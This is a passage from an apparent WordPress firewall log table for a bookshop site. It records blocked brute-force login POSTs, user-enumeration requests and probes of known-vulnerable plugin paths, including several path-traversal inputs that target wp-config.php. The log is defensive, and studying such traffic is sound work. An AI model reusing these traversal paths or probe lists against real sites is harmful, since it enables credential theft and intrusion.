,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','jYIPJ7vnsqZgV8wdaGh63RTE',0,1638382233.5500,179,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','LtXyWE8AlUSidbQYoHmNa6C2',0,1638382279.6541,411,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','wAjh7MospSePXJQkzfZNHW6E',0,1638382326.0496,211,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','HNOrIPvD0GEsQCAj65xZ8XMb',0,1638382368.6630,374,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','rpyUkY0aloHXu38WVQPc1jI9',0,1638382411.6864,371,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','s45XHnFACM2uK3iqbvr8lPVh',0,1638382459.2768,431,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','y7unAwzHpl6UFJXY8IW1qEOr',0,1638382507.9149,137,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','RlG5h1Hd4oKDa2LjinPEyMgr',0,1638382552.7088,374,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','N4yVQ0P8HuTq7a1kUJGYsWjh',0,1638382594.8178,385,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','jJ9mbHwXi7lCagUY8sMODqpP',0,1638382642.5565,433,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','qFpPrtoRmZd6Vy5iLX34wBvh',0,1638382721.1541,389,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','0a3Towz6IBGy9HXhuClOZcjQ',0,1638382768.8580,357,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','ZR2FX1piGBxKkjcvrNA9nsze',0,1638382837.1436,387,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','uyMwvngZYcPCSDV680oUx5A4',0,1638382883.8936,381,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','0aHshYQXd8D7kBfNI1oT2453',0,1638382928.8066,255,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','is1FUYBnK6GAd3VQb9SJPmCW',0,1638382971.7232,147,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','4oGMcE6dCOjRyrZPFYJhwA1p',0,1638383014.7159,389,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','o43EVkKrf9sOB5YLpNInMgji',0,1638383057.5213,391,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','xoQZ63LqnuA2p8JdmDcWEkCb',0,1638383100.2879,390,'','POST',404,0,700,0,1,'',0),('105.72.158.66',1766366786,'','https://ashbooks.co.uk//wp-json/wp/v2/users/','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4240.193 Safari\\/537.36\"}','oh1q8EBsMXJgLy0cWrmnY7GP',0,1638383123.8861,316,'','GET',403,0,520,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','1RMxZcB3Sui94zCwjDf52UEQ',0,1638383144.1954,357,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','Frha87OAJjCiYvlWNTgsuVD5',0,1638383188.3390,1424,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','xMz6DjnBq4Kr9SipCdye0a2O',0,1638383232.5853,375,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','o9AQLM5pw3OkiEjV7lCyzXrh',0,1638383274.8085,1030,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','NivUk6RAtEKg8DeVIBHQY2Ma',0,1638383317.4336,884,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','BkUowjKzhNat7TL0A2IQPZvg',0,1638383361.2115,404,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','JRVfEudmTnSYwtxoIkbhz3q1',0,1638383401.5919,363,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','CRk3ITN8GaWHjBVDPpsSy5eh',0,1638383444.9428,367,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','8trv6dnRL1eSmKhBkFUzs2lJ',0,1638383487.7113,852,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','UvR3jat8LKs2Px5eVZciguOw',0,1638383530.8841,808,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','diezR5WutU40cvgSLO1FTb9P',0,1638383573.2314,361,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','CwG4itkWSUA9yavLIKlZm7ds',0,1638383615.6184,351,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','HaoQFpxLN0ek8hT5ER1Knywi',0,1638383658.1502,346,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','S9o4wBabfIpZ6zy1rmHjAE0O',0,1638383700.5946,384,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','dhmwRrUenQLx6VKpPkuy1sH8',0,1638383747.5661,1356,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','cXQflFRzZv7N4IMny2ktHCL5',0,1638383789.0172,374,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','Mvdat9xFHwClALjp4Bf857hK',0,1638383833.9803,394,'','POST',404,0,700,0,1,'',0),('46.232.249.138',787020170,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','KEvW57jDMV31XCmpbxHNyYrI',0,1638383858.7456,409,'','POST',403,0,600,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','PDj3veF95IoAXHVi4y7sESYd',0,1638383886.8785,785,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','B3duhypYZT9C4Ivatg5ecN8n',0,1638383949.8303,371,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','b29mrPacSCfwURXsxIpv0eu4',0,1638383996.1736,660,'','POST',404,0,700,0,1,'',0),('197.2.127.246',3305275382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0\"}','rPcIOXlgSmpBFhT6Q7dAHwUL',0,1638384040.9439,594,'','POST',404,0,700,0,1,'',0),('196.75.186.8',3293297160,'','https://ashbooks.co.uk/wp-admin/vuln.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/28.0\"}','Ed50wh3nSQiPZecTVGDpLF69',0,1638384399.1994,347,'','GET',403,0,700,0,1,'',0),('196.75.186.8',3293297160,'','https://ashbooks.co.uk/wp-content/plugins/formcraft/file-upload/server/content/upload.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/28.0\"}','tTa3p97xlw2HdsbPuXoJWgLv',0,1638384415.1795,365,'','GET',403,0,700,0,1,'',0),('196.75.186.8',3293297160,'','https://ashbooks.co.uk/wp-content/plugins/hd-webplayer/playlist.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/28.0\"}','CQV0OURipq8McexbKHZ5Nuoh',0,1638384429.1197,364,'','GET',403,0,700,0,1,'',0),('196.75.186.8',3293297160,'','https://ashbooks.co.uk/wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=../../../../../wp-config.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/28.0\"}','RCTYPnMubKf7o12xWahvmFwj',0,1638384431.9597,339,'','GET',403,0,700,0,1,'',0),('196.75.186.8',3293297160,'','https://ashbooks.co.uk/wp-content/plugins/ungallery/source_vuln.php?pic=../../../../../wp-config.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/28.0\"}','3mVUyBca9tvbKnSqfHF7QMrj',0,1638384432.8043,166,'','GET',403,0,700,0,1,'',0),('196.75.186.8',3293297160,'','https://ashbooks.co.uk/wp-content/plugins/viral-optins/api/uploader/file-uploader.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/28.0\"}','vspheauKjC1mx3Dd0irnLF9G',0,1638384434.3747,368,'','GET',403,0,700,0,1,'',0),('196.75.186.8',3293297160,'','https://ashbooks.co.uk/fckeditor/editor/filemanager/connectors/php/upload.php?Type=Media','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:28.0) Gecko\\/20100101 Firefox\\/28.0\"}','N9xPDR2ry1QtgMUBzjwdXT7V',0,1638384435.8421,360,'','GET',403,0,700,0,1,'',0),('196.75.186.8',3293297160,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko\\/20100101 Firefox\\/64.0\"}','IFHUfgVD90urk4M1jR3Xwvid',0,1638384437.5799,408,'','GET',404,0,700,0,1,'',0),('95.105.65.146',1600733586,'','https://www.ashbooks.co.uk/weblog/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\",\"2\":\"https:\\/\\/www.ashbooks.co.uk\\/weblog\\/index.php\"}','ot4aHC3wETMuezKFAyDgXiG1',0,1638390567.4211,167,'','GET',403,0,700,0,1,'',0),('192.187.127.21',3233513237,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Trident\\/7.0; rv:11.0) like Gecko\"}','GcUKySwXgoV3l4M8AdZqu2kQ',0,1638395737.0363,403,'','POST',403,0,600,0,1,'',0),('5.188.62.140',96222860,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/41.0.2225.0 Safari\\/537.36\"}','Ebfr0k3YWLSHaBU1DNGQlMsK',0,1638401857.8814,721,'','POST',403,0,600,0,1,'',0),('106.12.77.101',1779191141,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','pWDJvQo2zaVxF7eksbICZSlN',0,1638403230.1776,435,'','POST',403,0,600,0,1,'',0),('178.62.32.134',2990416006,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','0Je1aICkTHRdZUwMGqvplQnP',0,1638405058.2746,382,'','POST',403,0,600,0,1,'',0),('199.192.30.216',3351256792,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','pWGuFZqaeyNc8f2KLxS50nXi',0,1638407110.1558,431,'','POST',403,0,600,0,1,'',0),('103.51.103.73',1731422025,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','gHBmnLD7JvsS4TFqU2xElbYW',0,1638409221.8660,391,'','POST',403,0,600,0,1,'',0),('108.163.233.106',1822681450,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','shGvqtQAj4uTbWdOUlkNmJie',0,1638411211.7022,400,'','POST',403,0,600,0,1,'',0),('107.181.180.168',1807070376,'','https://www.ashbooks.co.uk/weblog/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.72 Safari\\/537.36 Edg\\/90.0.818.39\",\"2\":\"https:\\/\\/www.ashbooks.co.uk\\/weblog\\/index.php\"}','4eNolXv6yWwC5naiqJ28bsIG',0,1638411634.0874,2796,'','GET',403,0,700,0,1,'',0),('52.249.253.235',888798699,'','https://ashbooks.co.uk/1index.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','UGO1heBwDkWspX895F6ijHQ4',0,1638412281.2840,629,'','GET',403,0,700,0,1,'',0),('52.249.253.235',888798699,'','https://ashbooks.co.uk/1index.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','jNYQg39KCpGZonA7q1vkfSbx',0,1638412322.3807,391,'','GET',403,0,700,0,1,'',0),('159.65.225.6',2671894790,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','pkmcH3jxqs9yUEFuJwAbSKaQ',0,1638413156.5638,159,'','POST',403,0,600,0,1,'',0),('167.71.17.63',2806452543,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','8BwetG1ZyzdskSLaRCDg0jVA',0,1638415038.4266,1061,'','POST',403,0,600,0,1,'',0),('103.109.30.30',1735204382,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','s6LmWrENdaUHRkZc71xz0Q9e',0,1638416105.3828,470,'','POST',403,0,600,0,1,'',0),('45.119.213.225',762828257,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','02EytrWGHCRTaAmFvpefOI8g',0,1638416936.4568,470,'','POST',403,0,600,0,1,'',0),('35.195.135.67',600016707,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','0XohQREs9Uzm47JnfpTOxFZD',0,1638417619.0233,424,'','POST',403,0,600,0,1,'',0),('192.64.150.99',3225458275,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','z1IMZQUaLW7xdSCq0y3VoTFD',0,1638418269.8164,175,'','POST',403,0,600,0,1,'',0),('204.12.198.242',3423389426,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 7_1 like Mac OS X) AppleWebKit\\/537.51.2 (KHTML, like Gecko) Version\\/7.0 Mobile\\/11D167 Safari\\/9537.53\"}','TL4G2cw1tECRHeAiPpnBaMNX',0,1638418593.1166,259,'','POST',403,0,600,0,1,'',0),('82.223.55.49',1390360369,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','10aYNFQ5LTd6bV29hHon7vkD',0,1638418997.2669,443,'','POST',403,0,600,0,1,'',0),('185.165.116.22',3114628118,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','SyhIb83i9raoWmvLU4df6kVD',0,1638419724.7091,428,'','POST',403,0,600,0,1,'',0),('103.209.153.32',1741789472,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','i8km07WH1UVzfbwM9vZcnXat',0,1638420369.2367,452,'','POST',403,0,600,0,1,'',0),('104.199.146.31',1757909535,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','1dPfjrxK9v6yUOmYGDwR7nQL',0,1638420998.5491,1301,'','POST',403,0,600,0,1,'',0),('212.224.76.233',3571469545,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','JVySiY10TICtvE7dxu4Ba8MW',0,1638421515.4670,173,'','POST',403,0,600,0,1,'',0),('178.62.9.122',2990410106,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','BK2W4ZdQSCO8xGlvXtyIYnu0',0,1638422163.7898,180,'','POST',403,0,600,0,1,'',0),('135.181.111.177',2276814769,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','6RcNP4kt23hp0n8OJYaZxUiq',0,1638422747.8956,177,'','POST',403,0,600,0,1,'',0),('161.97.154.64',2707528256,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','JflNo8Mn7qhSpC2tOcrWV1ed',0,1638423286.7739,186,'','POST',403,0,600,0,1,'',0),('200.58.109.114',3359272306,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','4oP5IVujiNtl0pX2G6aCsMFn',0,1638423845.5707,426,'','POST',403,0,600,0,1,'',0),('131.72.221.190',2202590654,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','NIwWHf8Rj9B6DqM2ukpCSTe3',0,1638424421.7370,445,'','POST',403,0,600,0,1,'',0),('178.62.110.145',2990435985,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','yjmv1grshQ8K4wtYOZocUCST',0,1638424943.3531,177,'','POST',403,0,600,0,1,'',0),('212.192.241.6',3569414406,'','https://ashbooks.co.uk/1index.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','nRmGd7erqoEXsOCP3k8wzcIW',0,1638425185.9909,422,'','GET',403,0,700,0,1,'',0),('212.192.241.6',3569414406,'','https://ashbooks.co.uk/1index.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','pImSiuajkT97lNH14JFLdW82',0,1638425267.5657,453,'','GET',403,0,700,0,1,'',0),('192.163.204.229',3231960293,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','fg9Ro2tcTHLK5BeyhEsq4O8u',0,1638425472.2034,442,'','POST',403,0,600,0,1,'',0),('23.228.109.147',400846227,'','https://ashbooks.co.uk/wp-content/plugins/seo-watcher/ofc/php-ofc-library/ofc_upload_image.php','','{\"1\":\"ALittle Client\"}','AS2ETxuVIa5QbBl3vg4Md1Ff',0,1638426307.0638,436,'','GET',403,0,700,0,1,'',0),('177.55.124.21',2973203477,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','yqkPjEtW24xz6ZD1LaTQvdln',0,1638426519.0431,463,'','POST',403,0,600,0,1,'',0),('161.97.178.213',2707534549,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','TYQ82lehHDtg7fu09crxBaWA',0,1638427065.3402,183,'','POST',403,0,600,0,1,'',0),('104.131.18.212',1753420500,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','TmSDPNCdtVnvigeQkB0aXqpH',0,1638427659.2744,769,'','POST',403,0,600,0,1,'',0),('69.30.231.156',1159653276,'','https://www.ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10.8; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','p1BDHOzrYZmg79SvoT5h3Il2',0,1638427682.4826,165,'','POST',403,0,600,0,1,'',0),('173.212.214.140',2916406924,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','K309WjqmGdx2zDotZFAI8lbw',0,1638428132.3899,172,'','POST',403,0,600,0,1,'',0),('148.72.211.177',2487800753,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','HiTgcrNjASCI09yzoBPd5Kks',0,1638428678.0868,436,'','POST',403,0,600,0,1,'',0),('147.182.248.182',2478241974,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','EqBCyzVXk9jirQbOP1KLpfJR',0,1638429178.8892,188,'','POST',403,0,600,0,1,'',0),('39.106.105.38',661285158,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','RUhZvBGTd2L4XAr7KyOxo1zm',0,1638430276.7959,200,'','POST',403,0,600,0,1,'',0),('103.74.118.242',1732933362,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','qdptmoQgGinSzLl36X5aRMFO',0,1638430887.0122,441,'','POST',403,0,600,0,1,'',0),('34.64.218.102',574675558,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','AtC0SswZcG7Vamu2pHrhiLWy',0,1638431482.1716,429,'','POST',403,0,600,0,1,'',0),('161.35.210.101',2703479397,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','T8qeN4G7l0mKQZwrcHRI1uVs',0,1638432001.7643,238,'','POST',403,0,600,0,1,'',0),('89.46.109.153',1496214937,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','kCpbnWV8jv5tGRIoTL0zNMDe',0,1638432666.5038,180,'','POST',403,0,600,0,1,'',0),('89.46.109.153',1496214937,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','9DbUJQ26AaBHPcdmqsKtNREL',0,1638433218.7628,161,'','POST',403,0,600,0,1,'',0),('185.165.118.46',3114628654,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','FqnRaJwUu90yCpEso8OWtlGf',0,1638433839.7597,187,'','POST',403,0,600,0,1,'',0),('142.93.170.99',2388503139,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','OvKWITfZ1DkNgut6zAx4bJFH',0,1638434394.4475,3071,'','POST',403,0,600,0,1,'',0),('142.93.99.56',2388484920,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','nYXj4atEFI7RvAmsgz5BO9NV',0,1638435017.1450,405,'','POST',403,0,600,0,1,'',0),('178.128.14.157',2994736797,'','https://ashbooks.co.uk/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko\\/20100101 